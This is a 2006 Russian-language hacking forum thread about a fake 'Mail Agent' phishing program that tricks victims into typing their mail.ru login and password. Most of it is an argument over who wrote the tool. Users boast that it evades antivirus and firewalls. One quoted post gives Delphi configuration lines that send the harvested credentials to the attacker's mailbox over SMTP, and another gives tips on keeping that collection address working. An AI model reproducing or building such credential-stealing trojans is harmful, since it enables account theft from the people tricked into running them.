ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > E-Mail

Опции темы Поиск в этой теме Опции просмотра

Старый 04.10.2006, 00:01
diavolos
Новичок
Провел на форуме:
58830

бля вот мне делать нех тя втаптывать в грязь?я не хотел не кого оскорбить извини если обидел....но если ты не веришь смотри сюда фома не верующая....
вот тебе скрин на то как я заполнил прогу мыло свое...
Код HTML:
http://www.webfile.ru/1135243
под*** пассы...

Код HTML:
http://www.webfile.ru/1135334
а вот ошибочка.....

еще скажи я спецом все эт подрисовал)))все закрыли эту тему....я ниче не имею против твоей проге...у тя лучше моей...

З.Ы. ошибка вызвана тем что то какой то антивирусник пытаеться предотвартить соединение..значь мой комп не прошел твой агент)))
З.З.Ы. это просто был комент к ошибке...все закрыли тему насчет твоего агента....

Последний раз редактировалось diavolos; 04.10.2006 в 00:10..

Старый 04.10.2006, 10:55
Bad-XxX
Новичок
Провел на форуме:
39936

Цитата:
З.Ы. ошибка вызвана тем что то какой то антивирусник пытаеться предотвартить соединение..значь мой комп не прошел твой агент)))
З.З.Ы. это просто был комент к ошибке...все закрыли тему насчет твоего агента....
Извини канеш, я понимаю, ты свой фейк для мейл агента хотел продавать по видимости, а я тут, такой козёл, взял и выложил его забесплатно, причём сорцы %) Не понтуйся, всё работает прекрасно, антивири не ловят, файрволлы тоже, а если файрволл ловит его - то твой фейк будет ловить также, структура потому что в общем целом я уверен - одинакова. Просто многие файрволлы не ловят соединение на Smtpшный порт, а те которые ловят - они и твой фейк поймают.
ЗЫ: А то, что он у тебя ошибку выводит, это именно из-за того, что не правильно ввёл логин и пароль (если вообще их ввёл) в исходном коде.
ЗЗЫ: Если у тебя там всё так о*уенно, выложи свои сорцы, тогда тут и твой фейк покритикуем. А мой трой полностью качественно отработан до мелочей, багов нету вообще, уже миллион раз проверил, хоть что говори. А всё, что ты сказал выше - полный бред и это даже критикой сложно назвать, т.к. всё работает прекрасней некуда.

Последний раз редактировалось Bad-XxX; 04.10.2006 в 11:00..

Старый 04.10.2006, 11:20
Undernative
Постоянный
Провел на форуме:
3383265

Отправить сообщение для Undernative с помощью ICQ Отправить сообщение для Undernative с помощью Yahoo

БэД Все кулл пашет дьявол,я ж говорил что ты не первый ....

Выложи на критику свои исходники .и не флуди тут,собщение через сообщение....

Старый 04.10.2006, 17:18
diavolos
Новичок
Провел на форуме:
58830

Ну все ок я говорю ты круче меня все доволен?)))или мне поклониться те в ноги мека кульный хакер)))Бед крутой крутой))а если ты такой тугой я просто поясняю (и на этом ЗЫКРЫВАЕМ ТЕМУ) СКРИНЫ ВСЕ ДОКАЗЫВАЕТ ВВЕДЕНО ВСЕ ПРАВИЛЬНО!!!! ну выводит ошибку прерыванию твоего соединения не дает отправить почту ....
все закрыли тему у бэда лучше в сто раз чем мойй агент.......

Последний раз редактировалось diavolos; 04.10.2006 в 17:21..

Старый 05.10.2006, 16:34
devil2007
Banned
Провел на форуме:
769625

Отправить сообщение для devil2007 с помощью ICQ

Какой программой это можно изменить?

Старый 05.10.2006, 17:48
f0xyL
Познающий
Провел на форуме:
263648

Ребята выложите видео ешо раз

Старый 05.10.2006, 17:48
CampeR
Познающий
Провел на форуме:
141332

Отправить сообщение для CampeR с помощью ICQ

Вобщето данный проект был разработан очень давно и в паблик появилась даже статья как все это сделать статья была на хакеру и здесь и даже щас лежит

http://forum.antichat.ru/thread20997-%CB%E8%EF%EE%E2%FB%E9.html

все кому интересна статья а также вопросы по мейл агенту можете глянуть тут да и картинка у нас щас уже за более высокие версии и код доработан -))более лучше.Пишите в онлайн нам-)

http://bit-team.com/modules.php?name=Articles&file=view&articles_id=2

P.S. пиздить чужие проэкты и выдавать за своё неесть гуд...

Последний раз редактировалось Dessador; 05.10.2006 в 17:52..

Старый 05.10.2006, 19:39
ShowMessage
Новичок
Провел на форуме:
8875

Цитата:
Сообщение от Bad-XxX  
Инструкция для тех, кто так и не справился:
M.From.Text := 'mail_1@mail.ru'; //мыло
M.Recipients.Add;
M.Recipients.Items[0].Text := 'mail_1@mail.ru'; //мыло получателя
M.Subject := 'Cool!!! Pass to <'+edit1.Text+combobox1.Text+'>';
IdSMTP1.AuthenticationType := atLogin;
IdSMTP1.Host := 'smtp.mail.ru';
IdSMTP1.Username := 'mail_1'; //логин (login@mail.ru)
IdSMTP1.Password := 'password'; // пароль
Все подписанные поля надо править
С этим
1. Если ты смениш пас от мыла уже ничего неполучиш
2. Тебе прийдёт много гавна так как будут вводить неправильные пасы
3. Твоё мыло могут просто забанят так как слишком часто нельзя отправлять мыла СПАМ из за того что юзер будет жать по 10 раз и отправится много писем и следствие ты опять неполучиш пасов.

P.S. как и сказанно выше смотрите по ссылке статью там всё расписанно подробно, и таких проблем небудт...

Старый 05.10.2006, 20:01
diavolos
Новичок
Провел на форуме:
58830

мля ппц....
2Dessador
если ты хоть чуть чуть разбирался в программирование ты б увидел что мой пройект и этот вообще то различаеться....и не очень слабо)))так что прежде чем что то говоирть ты подумай об этом)))

Старый 05.10.2006, 20:12
CampeR
Познающий
Провел на форуме:
141332

Отправить сообщение для CampeR с помощью ICQ

diavolos ппц а чтож ты ранее писал,цитирую:

Касперский не обнаруживает...стоит у меня касперский.....максимум что может его определить оутпост...только хз не проверял на оутпосте....такой способ насчет агента я лично превый раз вижу я не видел больше дубликатов таких...а прога написанна на delphi и народ кто програмиирует думаю напишет без проблем...а если я буду выкладывать видео по создаванию агента мало кто поймет......

Вроде твои слова-),значит это не твой проект?